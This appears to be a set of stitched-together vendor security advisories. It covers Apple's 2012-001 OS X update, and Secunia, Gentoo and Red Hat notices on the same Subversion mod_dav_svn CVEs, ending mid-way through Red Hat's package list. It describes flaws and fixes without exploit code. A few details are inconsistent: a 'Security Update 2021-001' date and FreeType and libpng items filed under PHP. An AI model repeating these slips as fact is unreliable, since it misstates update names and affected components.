Impact: Some EV certificates may be trusted even if the
corresponding root has been marked as untrusted
Description: The certificate code trusted a root certificate to sign
EV certificates if it was on the list of known EV issuers, even if
the user had marked it as 'Never Trust' in Keychain. The root would
not be trusted to sign non-EV certificates.
CVE-ID
CVE-2011-3422 : Alastair Houghton
OpenGL
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Applications that use OS X's OpenGL implementation may be
vulnerable to an unexpected application termination or arbitrary code
execution
Description: Multiple memory corruption issues existed in the
handling of GLSL compilation.
CVE-ID
CVE-2011-3457 : Chris Evans of the Google Chrome Security Team, and
Marc Schoenefeld of the Red Hat Security Response Team
PHP
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Multiple vulnerabilities in PHP 5.3.6
Description: PHP is updated to version 5.3.8 to address several
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the PHP web site at
http://www.php.net
CVE-ID
CVE-2011-1148
CVE-2011-1657
CVE-2011-1938
CVE-2011-2202
CVE-2011-2483
CVE-2011-3182
CVE-2011-3189
CVE-2011-3267
CVE-2011-3268
PHP
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in FreeType's
handling of Type 1 fonts. This issue is addressed by updating
FreeType to version 2.4.7. Further information is available via the
FreeType site at http://www.freetype.org/
CVE-ID
CVE-2011-3256 : Apple
PHP
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Multiple vulnerabilities in libpng 1.5.4
Description: libpng is updated to version 1.5.5 to address multiple
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the libpng website at
http://www.libpng.org/pub/png/libpng.html
CVE-ID
CVE-2011-3328
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Opening a maliciously crafted MP4 encoded file may lead to
an unexpected application termination or arbitrary code execution
Description: An uninitialized memory access issue existed in the
handling of MP4 encoded files.
CVE-ID
CVE-2011-3458 : Luigi Auriemma and pa_kt both working with
TippingPoint's Zero Day Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A signedness issue existed in the handling of font
tables embedded in QuickTime movie files.
CVE-ID
CVE-2011-3248 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An off by one buffer overflow existed in the handling
of rdrf atoms in QuickTime movie files.
CVE-ID
CVE-2011-3459 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted JPEG2000 image file may lead
to an unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of JPEG2000
files.
CVE-ID
CVE-2011-3250 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Processing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of PNG files.
CVE-ID
CVE-2011-3460 : Luigi Auriemma working with TippingPoint's Zero Day
Initiative
QuickTime
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of FLC
encoded movie files
CVE-ID
CVE-2011-3249 : Matt 'j00ru' Jurczyk working with TippingPoint's Zero
Day Initiative
SquirrelMail
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Multiple vulnerabilities in SquirrelMail
Description: SquirrelMail is updated to version 1.4.22 to address
several vulnerabilities, the most serious of which is a cross-site
scripting issue. This issue does not affect OS X Lion systems.
Further information is available via the SquirrelMail web site at
http://www.SquirrelMail.org/
CVE-ID
CVE-2010-1637
CVE-2010-2813
CVE-2010-4554
CVE-2010-4555
CVE-2011-2023
Subversion
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Accessing a Subversion repository may lead to the disclosure
of sensitive information
Description: Subversion is updated to version 1.6.17 to address
multiple vulnerabilities, the most serious of which may lead to the
disclosure of sensitive information. Further information is available
via the Subversion web site at http://subversion.tigris.org/
CVE-ID
CVE-2011-1752
CVE-2011-1783
CVE-2011-1921
Time Machine
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: A remote attacker may access new backups created by the
user's system
Description: The user may designate a remote AFP volume or Time
Capsule to be used for Time Machine backups. Time Machine did not
verify that the same device was being used for subsequent backup
operations. An attacker who is able to spoof the remote volume could
gain access to new backups created by the user's system. This issue
is addressed by verifying the unique identifier associated with a
disk for backup operations.
CVE-ID
CVE-2011-3462 : Michael Roitzsch of the Technische Universitat
Dresden
Tomcat
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Multiple vulnerabilities in Tomcat 6.0.32
Description: Tomcat is updated to version 6.0.33 to address multiple
vulnerabilities, the most serious of which may lead to the disclosure
of sensitive information. Tomcat is only provided on Mac OS X Server
systems. This issue does not affect OS X Lion systems. Further
information is available via the Tomcat site at
http://tomcat.apache.org/
CVE-ID
CVE-2011-2204
WebDAV Sharing
Available for: OS X Lion Server v10.7 to v10.7.2
Impact: Local users may obtain system privileges
Description: An issue existed in WebDAV Sharing's handling of user
authentication. A user with a valid account on the server or one of
its bound directories could cause the execution of arbitrary code
with system privileges. This issue does not affect systems prior to
OS X Lion.
CVE-ID
CVE-2011-3463 : Gordon Davisson of Crywolf
Webmail
Available for: OS X Lion v10.7 to v10.7.2,
OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted e-mail message may lead to the
disclosure of message content
Description: A cross-site scripting vulnerability existed in the
handling of mail messages. This issue is addressed by updating
Roundcube Webmail to version 0.6. This issue does not affect systems
prior to OS X Lion. Further information is available via the
Roundcube site at http://trac.roundcube.net/
CVE-ID
CVE-2011-2937
X11
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 to v10.7.2, OS X Lion Server v10.7 to v10.7.2
Impact: Viewing a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in FreeType's
handling of Type 1 fonts. This issue is addressed by updating
FreeType to version 2.4.7. Further information is available via the
FreeType site at http://www.freetype.org/
CVE-ID
CVE-2011-3256 : Apple
OS X Lion v10.7.3 and Security Update 2012-001 may be obtained from
the Software Update pane in System Preferences, or Apple's Software
Downloads web site:
http://www.apple.com/support/downloads/
The Software Update utility will present the update that applies
to your system configuration. Only one is needed, either
Security Update 2021-001 or OS X v10.7.3.
For OS X Lion v10.7.2
The download file is named: MacOSXUpd10.7.3.dmg
Its SHA-1 digest is: 7102fe8f9f47286c45dfa35f6e84e7f730493a7c
For OS X Lion v10.7 and v10.7.1
The download file is named: MacOSXUpdCombo10.7.3.dmg
Its SHA-1 digest is: 07dfce300f6801eb63d9ac13e0bec84e1862a16c
For OS X Lion Server v10.7.2
The download file is named: MacOSXServerUpd10.7.3.dmg
Its SHA-1 digest is: 55a9571635d4ec088c142d68132d0d69fcb8867d
For OS X Lion Server v10.7 and v10.7.1
The download file is named: MacOSXServerUpdCombo10.7.3.dmg
Its SHA-1 digest is: 2c87824f09734499ea166ea0617a3ac21ecf832b
For Mac OS X v10.6.8
The download file is named: SecUpd2012-001Snow.dmg
Its SHA-1 digest is: 40875ee8cb609bbaefc8f421a9c34cc353db42b8
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2012-001.dmg
Its SHA-1 digest is: 53b3ca5548001a9920aeabed4a034c6e4657fe20
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.16 (Darwin)
iQEcBAEBAgAGBQJPKYxNAAoJEGnF2JsdZQeeLiIIAMLhH2ipDFrhCsw/n4VDeF1V
P6jSkGXC9tBBVMvw1Xq4c2ok4SI34bDfMlURAVR+dde/h6nIZR24aLQVoDLjJuIp
RrO2dm1nQeozLJSx2NbxhVh54BucJdKp4xS1GkDNxkqcdh04RE9hRURXdKagnfGy
9P8QQPOQmKAiWos/LYhCPDInMfrpVNvEVwP8MCDP15g6hylN4De/Oyt7ZshPshSf
MnAFObfBTGX5KioVqTyfdlBkKUfdXHJux61QEFHn8eadX6+/6IuKbUvK9B0icc8E
pvbjOxQatFRps0KNWeIsKQc5i6iQoJhocAiIy6Y6LCuZQuSXCImY2RWXkVYzbWo=
=c1eU
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Join Secunia @ FIRST Conference, 12-17 June, Hilton Vienna, Austria
See to the presentation "The Dynamics and Threats of End-Point Software Portfolios" by Secunia's Research Analyst Director, Stefan Frei.
Read more:
http://conference.first.org/
----------------------------------------------------------------------
TITLE:
Apache Subversion mod_dav_svn Two Denial of Service Vulnerabilities
SECUNIA ADVISORY ID:
SA44681
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44681/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44681
RELEASE DATE:
2011-06-02
DISCUSS ADVISORY:
http://secunia.com/advisories/44681/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44681/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44681
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in Apache Subversion, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
This vulnerability is reported in versions 1.6.16 and prior.
This vulnerability is reported in versions 1.5.0 through 1.6.16.
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor
2) The vendor credits Ivan Zhakov, VisualSVN.
ORIGINAL ADVISORY:
http://subversion.apache.org/security/CVE-2011-1752-advisory.txt
http://subversion.apache.org/security/CVE-2011-1783-advisory.txt
http://subversion.apache.org/security/CVE-2011-1921-advisory.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201309-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Low
Title: Subversion: Multiple vulnerabilities
Date: September 23, 2013
Bugs: #350166, #356741, #369065, #463728, #463860, #472202, #482166
ID: 201309-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Subversion, allowing
attackers to cause a Denial of Service, escalate privileges, or obtain
sensitive information.
Background
==========
Subversion is a versioning system designed to be a replacement for CVS.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-vcs/subversion < 1.7.13 >= 1.7.13
Description
===========
Multiple vulnerabilities have been discovered in Subversion. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could cause a Denial of Service condition or obtain
sensitive information. A local attacker could escalate his privileges
to the user running svnserve.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Subversion users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-vcs/subversion-1.7.13"
References
==========
[ 1 ] CVE-2010-4539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4539
[ 2 ] CVE-2010-4644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4644
[ 3 ] CVE-2011-0715
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0715
[ 4 ] CVE-2011-1752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1752
[ 5 ] CVE-2011-1783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1783
[ 6 ] CVE-2011-1921
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1921
[ 7 ] CVE-2013-1845
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1845
[ 8 ] CVE-2013-1846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1846
[ 9 ] CVE-2013-1847
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1847
[ 10 ] CVE-2013-1849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1849
[ 11 ] CVE-2013-1884
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1884
[ 12 ] CVE-2013-1968
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1968
[ 13 ] CVE-2013-2088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2088
[ 14 ] CVE-2013-2112
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2112
[ 15 ] CVE-2013-4131
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4131
[ 16 ] CVE-2013-4277
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4277
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201309-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: subversion security update
Advisory ID: RHSA-2011:0862-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-0862.html
Issue date: 2011-06-08
CVE Names: CVE-2011-1752 CVE-2011-1783 CVE-2011-1921
=====================================================================
1. Summary:
Updated subversion packages that fix three security issues are now
available for Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64
3. Description:
Subversion (SVN) is a concurrent version control system which enables one
or more users to collaborate in developing and maintaining a hierarchy of
files and directories while keeping a history of all changes. The
mod_dav_svn module is used with the Apache HTTP Server to allow access to
Subversion repositories via HTTP.
An infinite loop flaw was found in the way the mod_dav_svn module processed
certain data sets. If the SVNPathAuthz directive was set to
"short_circuit", and path-based access control for files and directories
was enabled, a malicious, remote user could use this flaw to cause the
httpd process serving the request to consume an excessive amount of system
memory. (CVE-2011-1783)
A NULL pointer dereference flaw was found in the way the mod_dav_svn module
processed requests submitted against the URL of a baselined resource. A
malicious, remote user could use this flaw to cause the httpd process
serving the request to crash. (CVE-2011-1752)
An information disclosure flaw was found in the way the mod_dav_svn
module processed certain URLs when path-based access control for files and
directories was enabled. A malicious, remote user could possibly use this
flaw to access certain files in a repository that would otherwise not be
accessible to them. Note: This vulnerability cannot be triggered if the
SVNPathAuthz directive is set to "short_circuit". (CVE-2011-1921)
Red Hat would like to thank the Apache Subversion project for reporting
these issues. Upstream acknowledges Joe Schaefer of the Apache Software
Foundation as the original reporter of CVE-2011-1752; Ivan Zhakov of
VisualSVN as the original reporter of CVE-2011-1783; and Kamesh
Jayachandran of CollabNet, Inc. as the original reporter of CVE-2011-1921.
All Subversion users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing the
updated packages, you must restart the httpd daemon, if you are using
mod_dav_svn, for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
709111 - CVE-2011-1752 subversion (mod_dav_svn): DoS (crash) via request to deliver baselined WebDAV resources
709112 - CVE-2011-1783 subversion (mod_dav_svn): DoS (excessive memory use) when configured to provide path-based access control
709114 - CVE-2011-1921 subversion (mod_dav_svn): File contents disclosure of files configured to be unreadable by those users
6. Package List:
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm
i386:
mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-javahl-1.6.11-7.el5_6.4.i386.rpm
subversion-perl-1.6.11-7.el5_6.4.i386.rpm
subversion-ruby-1.6.11-7.el5_6.4.i386.rpm
x86_64:
mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.x86_64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm
subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/subversion-1.6.11-7.el5_6.4.src.rpm
i386:
mod_dav_svn-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-javahl-1.6.11-7.el5_6.4.i386.rpm
subversion-perl-1.6.11-7.el5_6.4.i386.rpm
subversion-ruby-1.6.11-7.el5_6.4.i386.rpm
ia64:
mod_dav_svn-1.6.11-7.el5_6.4.ia64.rpm
subversion-1.6.11-7.el5_6.4.ia64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ia64.rpm
subversion-devel-1.6.11-7.el5_6.4.ia64.rpm
subversion-javahl-1.6.11-7.el5_6.4.ia64.rpm
subversion-perl-1.6.11-7.el5_6.4.ia64.rpm
subversion-ruby-1.6.11-7.el5_6.4.ia64.rpm
ppc:
mod_dav_svn-1.6.11-7.el5_6.4.ppc.rpm
subversion-1.6.11-7.el5_6.4.ppc.rpm
subversion-1.6.11-7.el5_6.4.ppc64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ppc.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.ppc64.rpm
subversion-devel-1.6.11-7.el5_6.4.ppc.rpm
subversion-devel-1.6.11-7.el5_6.4.ppc64.rpm
subversion-javahl-1.6.11-7.el5_6.4.ppc.rpm
subversion-perl-1.6.11-7.el5_6.4.ppc.rpm
subversion-ruby-1.6.11-7.el5_6.4.ppc.rpm
s390x:
mod_dav_svn-1.6.11-7.el5_6.4.s390x.rpm
subversion-1.6.11-7.el5_6.4.s390.rpm
subversion-1.6.11-7.el5_6.4.s390x.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.s390.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.s390x.rpm
subversion-devel-1.6.11-7.el5_6.4.s390.rpm
subversion-devel-1.6.11-7.el5_6.4.s390x.rpm
subversion-javahl-1.6.11-7.el5_6.4.s390x.rpm
subversion-perl-1.6.11-7.el5_6.4.s390x.rpm
subversion-ruby-1.6.11-7.el5_6.4.s390x.rpm
x86_64:
mod_dav_svn-1.6.11-7.el5_6.4.x86_64.rpm
subversion-1.6.11-7.el5_6.4.i386.rpm
subversion-1.6.11-7.el5_6.4.x86_64.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.i386.rpm
subversion-debuginfo-1.6.11-7.el5_6.4.x86_64.rpm
subversion-devel-1.6.11-7.el5_6.4.i386.rpm
subversion-devel-1.6.11-7.el5_6.4.x86_64.rpm
subversion-javahl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-perl-1.6.11-7.el5_6.4.x86_64.rpm
subversion-ruby-1.6.11-7.el5_6.4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.x86_64.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.x86_64.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.x86_64.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
mod_dav_svn-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
ppc64:
mod_dav_svn-1.6.11-2.el6_1.4.ppc64.rpm
subversion-1.6.11-2.el6_1.4.ppc.rpm
subversion-1.6.11-2.el6_1.4.ppc64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm
s390x:
mod_dav_svn-1.6.11-2.el6_1.4.s390x.rpm
subversion-1.6.11-2.el6_1.4.s390.rpm
subversion-1.6.11-2.el6_1.4.s390x.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm
x86_64:
mod_dav_svn-1.6.11-2.el6_1.4.x86_64.rpm
subversion-1.6.11-2.el6_1.4.i686.rpm
subversion-1.6.11-2.el6_1.4.x86_64.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.x86_64.rpm
subversion-javahl-1.6.11-2.el6_1.4.i686.rpm
subversion-javahl-1.6.11-2.el6_1.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/subversion-1.6.11-2.el6_1.4.src.rpm
i386:
subversion-debuginfo-1.6.11-2.el6_1.4.i686.rpm
subversion-devel-1.6.11-2.el6_1.4.i686.rpm
subversion-gnome-1.6.11-2.el6_1.4.i686.rpm
subversion-kde-1.6.11-2.el6_1.4.i686.rpm
subversion-perl-1.6.11-2.el6_1.4.i686.rpm
subversion-ruby-1.6.11-2.el6_1.4.i686.rpm
noarch:
subversion-svn2cl-1.6.11-2.el6_1.4.noarch.rpm
ppc64:
subversion-debuginfo-1.6.11-2.el6_1.4.ppc.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.ppc64.rpm
subversion-devel-1.6.11-2.el6_1.4.ppc.rpm
subversion-devel-1.6.11-2.el6_1.4.ppc64.rpm
subversion-gnome-1.6.11-2.el6_1.4.ppc.rpm
subversion-gnome-1.6.11-2.el6_1.4.ppc64.rpm
subversion-javahl-1.6.11-2.el6_1.4.ppc.rpm
subversion-javahl-1.6.11-2.el6_1.4.ppc64.rpm
subversion-kde-1.6.11-2.el6_1.4.ppc.rpm
subversion-kde-1.6.11-2.el6_1.4.ppc64.rpm
subversion-perl-1.6.11-2.el6_1.4.ppc.rpm
subversion-perl-1.6.11-2.el6_1.4.ppc64.rpm
subversion-ruby-1.6.11-2.el6_1.4.ppc.rpm
subversion-ruby-1.6.11-2.el6_1.4.ppc64.rpm
s390x:
subversion-debuginfo-1.6.11-2.el6_1.4.s390.rpm
subversion-debuginfo-1.6.11-2.el6_1.4.s390x.rpm
